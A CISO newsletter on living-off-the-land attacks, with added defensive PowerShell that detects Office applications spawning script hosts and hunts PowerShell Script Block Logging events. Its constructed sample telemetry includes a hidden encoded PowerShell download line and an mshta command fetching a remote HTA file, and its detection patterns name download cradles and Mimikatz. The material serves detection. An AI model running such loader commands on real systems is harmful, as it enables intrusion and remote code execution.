May 2026 Cloaked in Security


From the Desk of the CISO

Issue: May 2026

The Call is Coming from Inside the House: The Rise of LOTL Attacks

Modern cyber threats have undergone a fundamental shift: it is no longer enough to watch for "bad files" or external malware. Today, 84% of high-severity attacks leverage Living off the Land (LOTL) techniques.

In these scenarios, attackers do not bring their own weapons; they use the trusted tools already installed on your systems, such as PowerShell and WMIC, to move laterally, maintain access and steal data. Because these tools are legitimate, signed by the operating-system vendor and needed for daily IT operations, antivirus that hunts for known-bad files rarely sees the threat. The evidence is in how the tool is invoked, not in what is on disk.


The Issue: Why Your Own Tools are Being Used Against You

Attackers prefer LOTL tactics because they allow them to blend in with normal administrative activity.

  • Stealth and Persistence: By using native, vendor-signed binaries (often called "LOLBins"), threat actors blend in with routine administration and can remain undetected for months or even years.

  • Bypassing Defenses: Traditional security tools look for signatures of known malware. Since a LOTL attack drops no new executable on disk, there is no file hash or signature to flag; the only tell-tale is an unusual command line, an unusual parent process, or an unusual user or time of use.

  • Unmanaged Surface Area: Most organizations have hundreds of native tools active by default on every endpoint. Research shows that up to 95% of access to these risky tools is unnecessary for the users who hold it, creating a massive, unmanaged internal attack surface.


Our Mature Defense: Beyond Visibility to Behavioral Detection

Simple visibility into your network is no longer sufficient. To combat LOTL threats, we have matured our security capabilities to focus on behavioral-based detection rather than just signature-based tools.

  • Behavioral Analytics: We establish baselines for what "normal" looks like, then alert on deviations. If Microsoft Word spawns PowerShell, and that PowerShell process reaches out to download a file, our systems flag the parent-child chain as a deviation from the norm, whether or not the downloaded file is known malware.

  • Custom Concierge Detection: We don't just alert you to activity; we provide context. Our team interprets these complex behaviors in real time to distinguish between a legitimate IT task and an attacker moving through your environment.

  • Internal Attack Surface Reduction: We work to identify where access to administrative tools is excessive, helping to close the pathways attackers use before they can be exploited.
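The parent-child deviation described above (an Office application spawning a script host) is the kind of rule a behavioral detection runs over process-creation telemetry. The PowerShell below is an added example, not code from the newsletter or from our detection platform. It runs over constructed sample records; the field names (ParentImage, Image, CommandLine, UtcTime, Computer, User) follow Sysmon Event ID 1, and in production you would populate them from Sysmon or from Security Event ID 4688 (Creator Process Name, New Process Name, Process Command Line). Hostnames, users, the IP address and the encoded string are all invented for the sample.

```powershell
# Added example: flag script hosts spawned by Office applications and attach the
# triage context an analyst wants. Not part of the original newsletter.

$OfficeParents = @('WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE', 'MSACCESS.EXE')
$ScriptHosts   = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe',
                   'mshta.exe', 'wmic.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe')

function Find-OfficeSpawnedScriptHost {
    param([Parameter(Mandatory)] [object[]] $Events)

    foreach ($e in $Events) {
        if (-not $e.ParentImage -or -not $e.Image) { continue }   # incomplete record
        $parent = [IO.Path]::GetFileName($e.ParentImage)
        $child  = [IO.Path]::GetFileName($e.Image)

        if ($OfficeParents -contains $parent.ToUpper() -and $ScriptHosts -contains $child.ToLower()) {
            # The parent/child pair alone is the alert; the command-line checks add
            # context so the analyst can tell a macro-borne loader from an odd add-in.
            $reasons = @("Office parent $parent spawned $child")
            if ($e.CommandLine -match '(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}') {
                $reasons += 'Base64-encoded command'
            }
            if ($e.CommandLine -match '(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|\bcurl\b|https?://') {
                $reasons += 'download cradle / remote URL'
            }
            if ($e.CommandLine -match '(?i)-w(indowstyle)?\s+hidden|-nop\b|-noni\b') {
                $reasons += 'hidden or non-interactive flags'
            }
            [pscustomobject]@{
                Time        = $e.UtcTime
                Host        = $e.Computer
                User        = $e.User
                Parent      = $parent
                Child       = $child
                CommandLine = $e.CommandLine
                Reasons     = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample telemetry (hypothetical hosts, users, URL and payload).
# Record 2 is the benign control: an admin launching an inventory script from Explorer.
$sample = @(
    [pscustomobject]@{ UtcTime = '2026-05-04 09:12:31'; Computer = 'WS-0142'; User = 'CORP\jdoe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA' },
    [pscustomobject]@{ UtcTime = '2026-05-04 09:13:02'; Computer = 'WS-0077'; User = 'CORP\itadmin'
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -File C:\Scripts\Get-Inventory.ps1' },
    [pscustomobject]@{ UtcTime = '2026-05-04 09:15:47'; Computer = 'WS-0142'; User = 'CORP\jdoe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        Image       = 'C:\Windows\System32\mshta.exe'
        CommandLine = 'mshta.exe http://198.51.100.23/update.hta' }
)

# Records 1 and 3 are returned; record 2 is not.
Find-OfficeSpawnedScriptHost -Events $sample | Format-Table -AutoSize
```

The point of the design is that the rule keys on the relationship between two legitimate, signed binaries rather than on either binary's hash, which is exactly what a signature-based tool cannot do. Expect to tune the parent list: some line-of-business add-ins legitimately launch cmd.exe from Excel, and those should be baselined out by parent path and command line rather than by disabling the rule.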


Remediation Steps: How to Protect Your Environment

  1. Harden Your Settings: Ensure that high-risk tools like PowerShell are only usable by those who strictly need them for their roles. In practice that means application control (AppLocker or Windows Defender Application Control) that permits PowerShell for administrative accounts only, Constrained Language Mode for everyone else, and removing the legacy PowerShell 2.0 engine, which predates modern logging and is a favorite way to sidestep it.

  2. Enable Advanced Logging: Ensure PowerShell Script Block Logging is active (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). This lets us see the actual commands being run: the logged block is the script as PowerShell executes it, so a command passed as Base64 with -EncodedCommand appears in clear text. Forward these events to a central collector; an attacker with local administrator rights can clear the local log.

  3. Practice Good Hygiene: Continue using strong, unique passwords and multifactor authentication (MFA). Most LOTL attacks begin with a compromised credential that allows the attacker to log in as a "trusted" user.

  4. Stay Updated: Regularly update your operating systems and security software to patch the vulnerabilities that attackers use for their initial entry.
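Steps 1 and 2 above come down to a policy setting and a query against the resulting events. The PowerShell below is an added example, not code from the newsletter or from our tooling, showing how to turn on Script Block Logging by policy, confirm it took effect, and hunt the last 24 hours of Event ID 4104 for the download-and-execute patterns attackers rely on. It must run in an elevated session on the endpoint (or via remoting). The indicator list is my own starting set, not a vendor-supplied one; the registry path and event fields are the documented Windows PowerShell 5.1 ones.

```powershell
# Added example: enable PowerShell Script Block Logging and hunt Event ID 4104.
# Not part of the original newsletter. Requires an administrator session.

$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Enable-ScriptBlockLogging {
    # Same setting as the Group Policy item "Turn on PowerShell Script Block Logging"
    # (Administrative Templates > Windows Components > Windows PowerShell).
    # A policy-hive value overrides any per-user preference, which is what we want
    # on managed endpoints.
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    Set-ItemProperty -Path $PolicyKey -Name EnableScriptBlockLogging -Value 1 -Type DWord
    # EnableScriptBlockInvocationLogging (events 4105/4106) is deliberately left off:
    # it multiplies event volume for very little added detection value.
}

function Test-ScriptBlockLogging {
    # $true when the policy value exists and is 1.
    $v = Get-ItemProperty -Path $PolicyKey -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    return ($null -ne $v -and $v.EnableScriptBlockLogging -eq 1)
}

function Find-SuspiciousScriptBlocks {
    param([int] $Hours = 24)

    # 4104 carries the script block as PowerShell compiled it. A command supplied
    # with -EncodedCommand is decoded before compilation, so the clear-text payload
    # is what lands here. Even before the policy is enabled, PowerShell 5+ writes
    # blocks it considers suspicious as 4104 at Warning level (Level 3), so the
    # query below is worth running on hosts that were never configured.
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    # Indicator set chosen for this example; tune to your own environment.
    $indicators = '(?i)FromBase64String|DownloadString|DownloadFile|Net\.WebClient|' +
                  'Invoke-Expression|\bIEX\b|Invoke-Mimikatz|Add-MpPreference|' +
                  'Set-MpPreference|-bxor|System\.Reflection\.Assembly|Start-BitsTransfer'

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = $xml.Event.EventData.Data
        $text = ($data | Where-Object Name -eq 'ScriptBlockText').'#text'
        $path = ($data | Where-Object Name -eq 'Path').'#text'

        if ($text -and $text -match $indicators) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                UserId  = $_.UserId
                Level   = $_.LevelDisplayName
                # An empty Path means the block came from the command line or an
                # in-memory loader rather than a .ps1 on disk: worth a closer look.
                Path    = if ($path) { $path } else { '<interactive or in-memory>' }
                Match   = $Matches[0]
                Snippet = $text.Substring(0, [Math]::Min(200, $text.Length))
            }
        }
    }
}

Enable-ScriptBlockLogging
if (Test-ScriptBlockLogging) {
    Find-SuspiciousScriptBlocks -Hours 24 | Sort-Object Time | Format-Table -AutoSize
} else {
    Write-Warning 'Script Block Logging policy value not set; check that this session is elevated.'
}
```

This covers Windows PowerShell 5.1, which is what the built-in LOLBin abuse almost always targets. PowerShell 7, if installed, writes its 4104 events to the PowerShellCore/Operational log and reads its policy from a separate PowerShellCore key, so it needs the same treatment a second time. Running the hunt on the endpoint is fine for a spot check; for the fleet, forward 4104 to your collector and run the same regex there, because a local log is the first thing an attacker with admin rights clears.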